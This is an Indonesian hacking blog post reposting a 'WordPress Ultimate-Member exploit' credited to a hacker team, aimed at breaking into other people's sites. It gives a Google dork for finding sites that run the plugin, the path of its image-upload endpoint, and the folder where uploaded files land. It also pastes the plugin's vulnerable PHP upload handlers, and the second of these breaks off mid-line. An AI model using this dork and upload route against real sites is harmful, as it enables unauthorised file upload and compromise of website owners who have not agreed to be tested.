Wordpress Ultimate-Member Theme Exploit


Wordpress Ultimate-Member Theme Exploit - Disini saya akan memberitahu Wordpress Exploit Ultimate-Member. Sebelumnya, terimakasih buat Regi A R yang sudah memberi izin untuk me-repost tutorial beliau. langsung aja disimak caranya.

#############################################################
# Author : Regi A R
# Date : 9/23/2019 9:26 PM
# Team : Noesantara 1945 Hacker Team
# Homepage : -
# Tested on : os Windows | Linux
#############################################################


  • Dork : inurl:/wp-content/plugins/ultimate-member/
  • Exploit : site.co.il/wp-content/plugins/ultimate-member/core/lib/upload/um-image-upload.php
  • File path : site.co.il/wp-content/uploads/ultimatemember/temp/...../wp-content/uploads/

  • Vulnerable Source code => [ um-image-upload.php ]
    <?php $i = 0; $dirname = dirname( __FILE__ ); do { $dirname = dirname( $dirname ); $wp_load = "{$dirname}/wp-load.php"; } while( ++$i < 10 && !file_exists( $wp_load ) ); require_once( $wp_load ); global $ultimatemember; $id = $_POST['key']; $ultimatemember->fields->set_id = $_POST['set_id']; $ultimatemember->fields->set_mode = $_POST['set_mode']; $ret['error'] = null; $ret = array(); if(isset($_FILES[$id]['name'])) { if(!is_array($_FILES[$id]['name'])) { $temp = $_FILES[$id]["tmp_name"]; $file = $_FILES[$id]["name"]; $file = sanitize_file_name($file); $error = $ultimatemember->files->check_image_upload( $temp, $id ); if ( $error ){ $ret['error'] = $error; } else { $ret[] = $ultimatemember->files->new_image_upload_temp( $temp, $file, um_get_option('image_compression') ); } } } else { $ret['error'] = __('A theme or plugin compatibility issue','ultimatemember'); } echo json_encode($ret); 
  •  Vulnerable Source code => [um-file-upload.php ]
  • <?php $i = 0; $dirname = dirname( __FILE__ ); do { $dirname = dirname( $dirname ); $wp_load = "{$dirname}/wp-load.php"; } while( ++$i < 10 && !file_exists( $wp_load ) ); require_once( $wp_load ); global $ultimatemember; $id = $_POST['key']; $ultimatemember->fields->set_id = $_POST['set_id']; $ultimatemember->fields->set_mode = $_POST['set_mode']; $ret['error'] = null; $ret = array(); if(isset($_FILES[$id]['name'])) { if(!is_array($_FILES[$id]['name'])) { $temp = $_FILES[$id]["tmp_name"]; $file = $_FILES[$id]["name"]; $file = sanitize_file_name($file); $extension = pathinf

    Terimakasih telah mengunjungi blog saya, semoga info tadi bermanfaat. Maaf bila ada salah kata/tulis, karena saya manusia bukan robot.
    Penulis, (abnid1337)

    No comments

    Powered by Blogger.